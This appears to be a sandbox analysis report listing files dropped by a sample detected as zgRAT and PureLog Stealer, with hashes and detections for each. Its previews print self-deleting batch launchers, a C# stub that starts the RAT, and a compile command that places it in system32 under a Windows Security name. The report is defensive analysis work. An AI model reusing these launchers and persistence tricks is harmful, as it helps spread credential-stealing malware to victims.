                                                                  Entropy (8bit):5.797295390114544
                                                                  Encrypted:false
                                                                  SSDEEP:6:AAra9uyRvq+XEWhLiRnTVxR/ImMaVlaRs0qhEWnF+m9//kbPTaNBextKw8WHWxcY:AAgy+NRinX/I5esRs0AEVy/ygBYIraQH
                                                                  MD5:278BD2271A21B01BEE6E0DDFF3518B17
                                                                  SHA1:8188A2D3D4C78B86F1FE906E50A4D51DA8402B33
                                                                  SHA-256:336C7CF8EF6A006D8D9AC9863ECF66196245614A22B246F5CD97AA56B5726C99
                                                                  SHA-512:C8D8B49D627D625D1ABD6D5AA5CB58FFF25FAC68D154D351A56D52275EF7AF7E69AC29E7E3BE83B38D72E1E8F6C4981EFC2B818297259C0A235832E8D43CC63B
                                                                  Malicious:false
                                                                  Preview:TeFqWekeqsL4hJaj5YDAo1lxh69RRz1YBAzLW4KEiNUnrPiTDpnmBcrb2SJafTM01w2gTONBO8bah7FSYpNmMPXiSYTEvtjPBdw5WBAzcmXDBR44N1BzGkomZUN55IQeYMYELK5WpXJk1ThBdY03suJbzKfByE4TW3py20tD5oKsaEvFwMbhRWvoC7OAo3ikdzN7osInox7DjaAvZZPmmXB9IAv4lsYBFjOl0xbDDx2dZrEm7dlOo67GxOzo6NC5Z579MY5l8Liyehka5J7HHJXJlIxl8wGzv7EdtEZiiAQcXImPoYswQ4yQiyXDkTmLEtDhdHq1tYjG34vdfi7kEUi0Ix45qV8PXEYoFFvhs1D2

                                                                  C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2006016
                                                                  Entropy (8bit):7.565400810273061
                                                                  Encrypted:false
                                                                  SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                  MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                  SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                  SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                                                  SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@....................................K....... ............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.........................\...M........................................0..........(.... ........8........E....*.......N...)...8%...(.... ....~p...{c...9....& ....8....*(.... ....~p...{y...:....& ....8....(.... ....~p...{....9....& ....8y......0.......... ........8........E....1...............V...8,.......~....(E...~....(I... ....?.... ....8.......... ....~p...{m...:....& ....8....~....(=... .... .... ....s....~....(A....... ....~p...{....9Q...& ....8F...r...ps....z*~....:..

                                                                  C:\Program Files\Windows Security\BrowserCore\en-US\d81cfa058c78b8

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:ASCII text, with very long lines (845), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):845
                                                                  Entropy (8bit):5.897614772047287
                                                                  Encrypted:false
                                                                  SSDEEP:12:Cr42WpCrApUCl5glvZXzcet9oMPDeSdef8Yjz4sTW17bJEj+2+tazYMLegG:04UGqlBzt9rLSUYjz4d2+btkyx
                                                                  MD5:ECBAAB294C165D0E25952251D1A8AF6E
                                                                  SHA1:15F7DA23E33A613565F716EC0D01F4474A4216A5
                                                                  SHA-256:B018C02EB84BED011EABAB1BB6D25CF277DBED9B7CDC5F69120C8BAE131AE404
                                                                  SHA-512:B561897E467A566150788D183C05E71E4A036359649A7E404A09F9119E49F71F9B56FBEF8559238BA6C7D98C860E0160C23668A7DF1FEDB8059540F8339E1DE5
                                                                  Malicious:false
                                                                  Preview:TJUr04pR7GbJpeJcef03IIBYp1pQPFPTbUFxTojnO9hWlStEJTWVDbrLI6C9PYB21IsUYVIz5MpIlowXIkH6t4P9m3pXmkYz8ofdkYpyKgZ1wjkdKo1oREI72ssepvMVx0K6JTwt4SwMeYNDTMM7suh3gik1pLIYTED5YoU12Ht9S6cefoLdiPmDSRaks5DtJX3ZURop1VFlAikjGFWA9pzEcAmHOtI7DAz5DCKOAgmNJACuq0eniDtehy7TohbHNIhAspgD5IAdDm5b72bXPeYAQUYOF0jcFe9AcCCBTasaCQb43fWwGD2tuhuXQS8EihYin484zZEyw7793dUjexWBmQQ5SouAcn2e22R9gb6q8D6wjuew7YkuLW6WnDmLpDWJFdHBMVCC0qCiTeWiK7DDCHTf64VdyuA5rxrFmdjmWi3eTXDJrDBrASG7KlES9iNGpH1gwQ5rXareNyMi0MwutT4Yqt5AYRmxUxzLggWaIUTjlmtVZgcxvcWWMczDU5SGx3KZ9ACUzWmZAUxE9jk1zzB1bc9DqTFMBMwscTWZeH7Zz6W2ovDvUbR81S8gB8ngQaYxiFlpNLXr1lBeGGY5PU2j4x0JVzYgebJZiiTjKXhJDkHPRdZ4jsQ5hy3vPbUYw1MZcl6ixzu1xsfTqk21Ze6wLO2tphUsDJWMYrxph1Gu7YHySjEojc8S4aONtM3PeCyoWT58wMThXMywGDaFdpJkKER8cj6V80P5kdc9oG1WJa4slcHpvxwz2NdRB6fNQ8jg73LmkbbWywbuKjXAcQjKEaCXAL8rkoGK1XvrReEUWZBGvtHbjfu9ZYcg0xmZctwJqQ3wy

                                                                  C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2006016
                                                                  Entropy (8bit):7.565400810273061
                                                                  Encrypted:false
                                                                  SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                  MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                  SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                  SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                                                  SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@....................................K....... ............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.........................\...M........................................0..........(.... ........8........E....*.......N...)...8%...(.... ....~p...{c...9....& ....8....*(.... ....~p...{y...:....& ....8....(.... ....~p...{....9....& ....8y......0.......... ........8........E....1...............V...8,.......~....(E...~....(I... ....?.... ....8.......... ....~p...{m...:....& ....8....~....(=... .... .... ....s....~....(A....... ....~p...{....9Q...& ....8F...r...ps....z*~....:..

                                                                  C:\ProgramData\dbg\containerReview.exe

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2006016
                                                                  Entropy (8bit):7.565400810273061
                                                                  Encrypted:false
                                                                  SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                  MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                  SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                  SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                                                  SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\dbg\containerReview.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\dbg\containerReview.exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@....................................K....... ............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.........................\...M........................................0..........(.... ........8........E....*.......N...)...8%...(.... ....~p...{c...9....& ....8....*(.... ....~p...{y...:....& ....8....(.... ....~p...{....9....& ....8y......0.......... ........8........E....1...............V...8,.......~....(E...~....(I... ....?.... ....8.......... ....~p...{m...:....& ....8....~....(=... .... .... ....s....~....(A....... ....~p...{....9Q...& ....8F...r...ps....z*~....:..

                                                                  C:\ProgramData\dbg\f71eea7c943fb4

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):248
                                                                  Entropy (8bit):5.784020017648331
                                                                  Encrypted:false
                                                                  SSDEEP:6:m2Iq9YR3fBDBf0JosJsoZs34L/yZNmXpAK8eHwzvRF:m69M5Dd0lzs34L0yphjwzvr
                                                                  MD5:3EAD95FD634626C32753A34629866057
                                                                  SHA1:3E5ABE269E18EF4BCBAC064D5C16E3C90DBD4AEA
                                                                  SHA-256:1CB6BC1DF5C79913CB8217FC2794522C1BB84F604B92A667A619943796CC95F1
                                                                  SHA-512:D98407622A008DC7004F9AFDFBB9F5BAA91CB2283590CD2992CE3976608C8531CAB73B017201B96699D5C2B54F5166329C3D66C484803BF0F99F7B0B23342302
                                                                  Malicious:false
                                                                  Preview:h1TKZ8GaDKGSynKtpAIIVIqUSvLuLeDTRIuC2X4Y5MNr7BagaCzMA03ZL82oxWOjHwBq3I0SFtMJ58XRUpUJo0TaOV04eQlj7nkKAumSLhGQnueMkkTIBF4QdkbiR6xzInLRYNRkCB8HtCxe0oU46dh2sTqZSEBOtRHAiNyWTtGAGxgbx7rmm33pFTiEh1R7AtYc4w5n07lMWhv5wPmVXYmzXc5PotzbcIAXYEgABEwoSqShhmSSO6kl

                                                                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\d81cfa058c78b8

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):279
                                                                  Entropy (8bit):5.789804915950466
                                                                  Encrypted:false
                                                                  SSDEEP:6:ZWIIK5tOMcn1i4e51sLz68UKWczRGSwr0cghkktpNB8Wa1:ZRIocYsLDaU+rRghkk7b+
                                                                  MD5:631C1C297D8462129BBDE3EFF97D1F14
                                                                  SHA1:5B8A8E938394A95FC7792B19A3FB058E0B34A79C
                                                                  SHA-256:8ED6065E580E092841C3D57F8BF45BA9D80C487216301192FF19A06C9B743CC7
                                                                  SHA-512:3FBE75B22ED372A56E859637FC2FEF8DFB866019A0E90EB1E5A6C8D86CEFC193CDF0C81232E58B3EEE9098D48340DE1976D628FAA494C311AB3EE2B0F9839445
                                                                  Malicious:false
                                                                  Preview:DgHE3Hvc4O1d2o1mm1af0Un4wwwKjyH4MVW5msPifa1jxPFhXMBhgGas3MSHUl2GG7RgS5A4l19ZdDGgrPwXwkXF4nCZZIN4ivd08iPbMG5pGAPzFvZFyeTgjLlo3kfdnF1rkPiI9VLqos94YNTosIFDc7Rw7killcBAJhO0MRFcTn11MrQpQ1ufAyPn8wLZxjEMq8u08dbbCmuyFakPU2VurfAVSk1aFqptioKN7ZrxZTdXEahiL6F4OUfL8ZhYmAVW6AQbQXS4LiUXCmR1DTP

                                                                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\mQBLhXIPAJ.exe

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2006016
                                                                  Entropy (8bit):7.565400810273061
                                                                  Encrypted:false
                                                                  SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                  MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                  SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                  SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                                                  SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@....................................K....... ............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.........................\...M........................................0..........(.... ........8........E....*.......N...)...8%...(.... ....~p...{c...9....& ....8....*(.... ....~p...{y...:....& ....8....(.... ....~p...{....9....& ....8y......0.......... ........8........E....1...............V...8,.......~....(E...~....(I... ....?.... ....8.......... ....~p...{m...:....& ....8....~....(=... .... .... ....s....~....(A....... ....~p...{....9Q...& ....8F...r...ps....z*~....:..

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\containerReview.exe.log

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1396
                                                                  Entropy (8bit):5.350961817021757
                                                                  Encrypted:false
                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                  MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                  SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                  SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                  SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                  Malicious:false
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\mQBLhXIPAJ.exe.log

                                                                  Download File
                                                                  Process:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1830
                                                                  Entropy (8bit):5.3661116947161815
                                                                  Encrypted:false
                                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktJtpaqZ4vwmj0K
                                                                  MD5:C2E0F17D6A14A9837FE55EE183305037
                                                                  SHA1:EB56F87DAE280A52D91E88872777FDEEB2E1DF76
                                                                  SHA-256:8D444C9F4CB992629221443E699471F7D71BA2F0FFFC1F9BEBBA9D2F18371D47
                                                                  SHA-512:F4C96FF497F0AF4756F6A65350B2F9CF3AE54CEF07E38FDF31AC653765F731256D2625E287C6AC3471A87297CC51EF4D37E857C7F51D4735681B20F0B376D855
                                                                  Malicious:false
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicK

                                                                  C:\Users\user\AppData\Local\Temp\2BGdjLelXV.bat

                                                                  Download File
                                                                  Process:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):210
                                                                  Entropy (8bit):5.1931694791072
                                                                  Encrypted:false
                                                                  SSDEEP:6:hCijTg3Nou1SV+DEBdvsvKOZG1923fliwfoRH:HTg9uYDE8ZAwAh
                                                                  MD5:E4D9DB7B862AE06C57031608714A9D2F
                                                                  SHA1:9044E283A21C94F193EE6F6ECE8AF9F985DFF3B8
                                                                  SHA-256:65D13E31C04DAABE8AAE551947E1D06FE51BA38EBA5977699AE4CD2A54CBC17E
                                                                  SHA-512:CD87E41D35CFE22F2BA3E365FB66D6B5B3D68BF6AEB215EE8846BF87C95A0D186AC37E9ECDBDC02898535E15275B18885AFC7AEB00EB11073FD473B541E6C72B
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\blockcomSession\mQBLhXIPAJ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\2BGdjLelXV.bat"

                                                                  C:\Users\user\AppData\Local\Temp\RES8539.tmp

                                                                  Download File
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6cc, 10 symbols, created Mon Jan 13 13:15:49 2025, 1st section name ".debug$S"
                                                                  Category:dropped
                                                                  Size (bytes):1924
                                                                  Entropy (8bit):4.6006675469885066
                                                                  Encrypted:false
                                                                  SSDEEP:48:/aLzta0uYD9PKPilmuulB+hnqXSfbNtmhn:Cn00uYRKPi2TkZzNtyn
                                                                  MD5:321DC5544F8AFB7F3BB31E27597989BD
                                                                  SHA1:D7FBCC15130D176F88523F434F622708AAA5DFFD
                                                                  SHA-256:8215FE1EFABF1CB4FEACB7DED98477EAA8D7BA7DCC527B04E4A46BA632B8CA79
                                                                  SHA-512:6B4279BC6F6826F58C22B6AAF59B2590573ECAB3F7B8942B94B1BAFFFC758CD753AC6DA4822E9B0DB773C573281A118EA7D1D26EB2A481A4E93775574ABBC70A
                                                                  Malicious:false
                                                                  Preview:L......g.............debug$S........T...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........Z....c:\Program Files (x86)\Microsoft\Edge\Application\CSC4E919528C4A844BA8820AEF1C7C5AE5.TMP.....................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RES8539.tmp.-.<....................a..Microsoft (R) CVTRES.Z.=..cwd.C:\blockcomSession.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.

                                                                  C:\Users\user\AppData\Local\Temp\RES87BA.tmp

                                                                  Download File
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Mon Jan 13 13:15:50 2025, 1st section name ".debug$S"
                                                                  Category:dropped
                                                                  Size (bytes):1952
                                                                  Entropy (8bit):4.550900254610488
                                                                  Encrypted:false
                                                                  SSDEEP:24:HbZbW97OTUxmQmpHdpFwKmwN8luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:/Jp9wKPKluOulajfqXSfbNtmh5Z
                                                                  MD5:12FC4A71778B4D76ACD2E14F95323554
                                                                  SHA1:57A926FA6910CCB1C79E3D1F8112A9CCCA88B18E
                                                                  SHA-256:071FBF8013DB34B70BD419808DEE02676CF194CD2D2B73659AB00B99363A569B
                                                                  SHA-512:2C6D06645997C00DFFE0189C637793745D74BCB3831A7DF048E41BB7055E5803C326969E5C3E2540945692FB083D34E0D09BA5CC9368E24B25926110E92F5719
                                                                  Malicious:false
                                                                  Preview:L......g.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........=....c:\Windows\System32\CSCBCEC8111DA4C46C5BB72BE8163F3D647.TMP.....................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RES87BA.tmp.-.<....................a..Microsoft (R) CVTRES.Z.=..cwd.C:\blockcomSession.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.

                                                                  C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):219
                                                                  Entropy (8bit):5.08257371103224
                                                                  Encrypted:false
                                                                  SSDEEP:6:hCijTg3Nou1SV+DE1ID6r4sKOZG1923fn8/kh:HTg9uYDE350/q
                                                                  MD5:EFF161C6218937BDDFF7AAB80EEFBB42
                                                                  SHA1:CAE8983C75147D542DC78359CE0D3EF9D79333D7
                                                                  SHA-256:E07456EAC00391DE77DA9771DDE7FAC7C1422A1BCC7836881140D9E41ED1346A
                                                                  SHA-512:E007A86E974063C6188FC469EB35924DA098C768C718431D1510388DB2EFE75769ECBBAC99F8E24385C1B3857D21762CF227808D8A9CE71FA11D8F39F1CE2B9B
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\All Users\dbg\containerReview.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\aQ1wx53V7n.bat"

                                                                  C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.0.cs

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                  Category:dropped
                                                                  Size (bytes):389
                                                                  Entropy (8bit):5.016520310032085
                                                                  Encrypted:false
                                                                  SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6FWaiFkD:JNVQIbSfhV7TiFkMSfhWA7FkD
                                                                  MD5:066983894FBB9214F01499462F5AE2A7
                                                                  SHA1:5027746611A46BED290E2FBE21EFBCE7F5847E5A
                                                                  SHA-256:1E5C801B9436DE20615C073BF3772DA10B68F4262CB675E9F9EF70E7C0137A37
                                                                  SHA-512:4B277B14FDB52EDA5C63E4F319E29D66DF861F8DE19BF1AA47878D288AD998958908D7D539F40CBFDA9A05A2DB4D200B0815FDD3BF538FE0B22BDEC8E5C06F19
                                                                  Malicious:false
                                                                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe"); } catch { } }).Start();. }.}.

                                                                  C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.cmdline

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):251
                                                                  Entropy (8bit):5.086047326415898
                                                                  Encrypted:false
                                                                  SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8o923f/YUn:Hu7L//TRq79cQyJ
                                                                  MD5:3C0BADC3DAAD991E2E34E6FF69B04947
                                                                  SHA1:58806495CE13CF84374A2D2F3E73DD373B8C9904
                                                                  SHA-256:1509B8D134F0C0F0A9F7AFAC12E42071F6629F9515622E247C6C8AED7BE09B86
                                                                  SHA-512:A8E1D626DA6FB131A9A03E2B820DB6E69D38958469D1D4D53D4CECE5CB3FC92CE8E9BFD5D3BA45985060FF641BFB0250C35E4FF453A0584F00941C93071CA966
                                                                  Malicious:false
                                                                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.0.cs"

                                                                  C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.out

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (326), with CRLF, CR line terminators
                                                                  Category:modified
                                                                  Size (bytes):747
                                                                  Entropy (8bit):5.25697441809899
                                                                  Encrypted:false
                                                                  SSDEEP:12:lI/u7L//TRq79cQyMKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:lI/un/Vq79tyMKax5DqBVKVrdFAMBJTH
                                                                  MD5:C395ACE0C523ADE603E26F439FB0999A
                                                                  SHA1:7BA022026B2E30296987A5237A904C62AD67C381
                                                                  SHA-256:FF1B416C44F44538A3B41579D6C07E18258A7FD08298E6BFBC88D4648BA5C88F
